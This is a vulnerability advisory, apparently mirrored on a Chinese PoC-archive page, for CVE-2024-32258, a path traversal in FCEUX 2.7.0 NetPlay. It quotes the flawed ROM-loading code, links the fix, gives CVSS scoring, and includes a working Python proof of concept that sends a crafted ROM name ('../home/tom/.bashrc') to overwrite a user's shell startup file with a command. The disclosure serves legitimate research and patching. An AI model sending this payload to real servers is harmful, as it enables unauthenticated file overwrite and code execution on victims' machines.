关联漏洞
标题:
fceux 路径遍历漏洞
(CVE-2024-32258)
描述:fceux是TAS Emulators on GitHub开源的一款适用于 Windows 和 Unix 的开源 NES Emulator。 fceux 2.7.0版本存在路径遍历漏洞,该漏洞源于允许攻击者通过假ROM在未经身份验证的情况下覆盖服务器上的任何文件。
介绍
## Overview
- **CVE ID**: [CVE-2024-32258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32258)
- **Type**: Path Traversal
- **Vendor**: [FCEUX](https://fceux.com/)
- **Products**: FCEUX_NetPlay
- **Version**: 2.7.0
- **Fix**: [48b48e7c13be1b949074f42660a33c7ef57135e1](https://github.com/TASEmulators/fceux/pull/728/commits/48b48e7c13be1b949074f42660a33c7ef57135e1)
## Description
FCEUX is a NES Emulator that can take us back to our childhood. It provides multiple interesting features, such as two players being able to play games online.
The server and client can pass ROMs to each other, but the server does not filter out special characters in the ROM names sent by the client. This path traversal vulnerability can cause any file on the server to be overwritten. Even more serious is that the remote loading of ROMs does not require authentication, even if the server settings require a password to log in.
It was introduced during commit [798c5a1d9c73b899cdbe3d613c0022588281979f](https://github.com/TASEmulators/fceux/commit/798c5a1d9c73b899cdbe3d613c0022588281979f) - *For NetPlay, added ability for client to request a ROM to load.*
```c++
if (acceptRomLoadReq)
{
FILE *fp;
std::string filepath = QDir::tempPath().toLocal8Bit().constData();
const char *romData = &static_cast<const char*>(msgBuf)[ sizeof(netPlayLoadRomReq) ];
filepath.append( "/" );
filepath.append( msg->fileName );
printf("Load ROM Request Received: %s\n", filepath.c_str());
//printf("Dumping Temp Rom to: %s\n", filepath.c_str());
fp = ::fopen( filepath.c_str(), "w");
if (fp == nullptr)
{
return;
}
::fwrite( romData, 1, msgSize, fp );
::fclose(fp);
FCEU_WRAPPER_LOCK();
LoadGame( filepath.c_str(), true, true );
FCEUI_SetEmulationPaused(EMULATIONPAUSED_PAUSED);
FCEU_WRAPPER_UNLOCK();
resyncAllClients();
}
```
Both `msf->fileName` and `fp` are specified by the attacker.
## PoC
You can obtain fceux through source code compilation, or you can directly use our compiled binary. [fceux.zip](https://github.com/liyansong2018/CVE-2024-32258/files/15028161/fceux.zip)
PoC
```python
import socket
import binascii
client = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
client.connect(('192.168.17.131', 4046))
header = "aa55aa55aa55aa550000000a00000204000000f0"
file_name = '../home/tom/.bashrc'
padding1 = '\0' * (256 - len(file_name))
nes_content = "gnome-calculator\n"
padding2 = '\0' * 0x100
client.send(binascii.unhexlify(header) + (file_name + padding1 + nes_content + padding2).encode())
res = client.recv(1024)
print(res)
packet = "0000000000000000000000000800450000641108400040062b8a7f0000017f000001cd340fcee511e70e3cfc427080180200fe5800000101080a94ee338594ee3382aa55aa55aa55aa5500000028000000300000000100000001000000000000000000000000000000000000000000000000"
client.send(binascii.unhexlify(packet))
res = client.recv(1024)
print(res)
```
Have fun! :smile:
https://github.com/liyansong2018/CVE-2024-32258/assets/25031216/2c237254-3ff8-4690-b0ea-d413f6e8c48d
## Severity
**High** 8.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| CVSS3.1 | Score | Detail |
| ------------------- | --------- | ------------------------------------------------- |
| ATTACK VECTOR | Network | launch attack through the network |
| ATTACK COMPLEXITY | Low | just send two messages |
| PRIVILEGES REQUIRED | None | no permissions are required to send attack packet |
| USER INTERACTION | Require | click the confirm button to load the ROM. |
| SCOPE | Unchanged | na |
| CONFIDENTIALITY | High | arbitrary file overwrite |
| INTEGRITY | High | arbitrary file overwrite |
| AVAILABILITY | High | arbitrary file overwrite |
## Author
Yansong Li and Yijie Xun (Northwestern Polytechnical University)
文件快照
[4.0K] /data/pocs/6c7c542ec6ae6af7f511d50f87a8a78a4923c3ea
└── [4.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。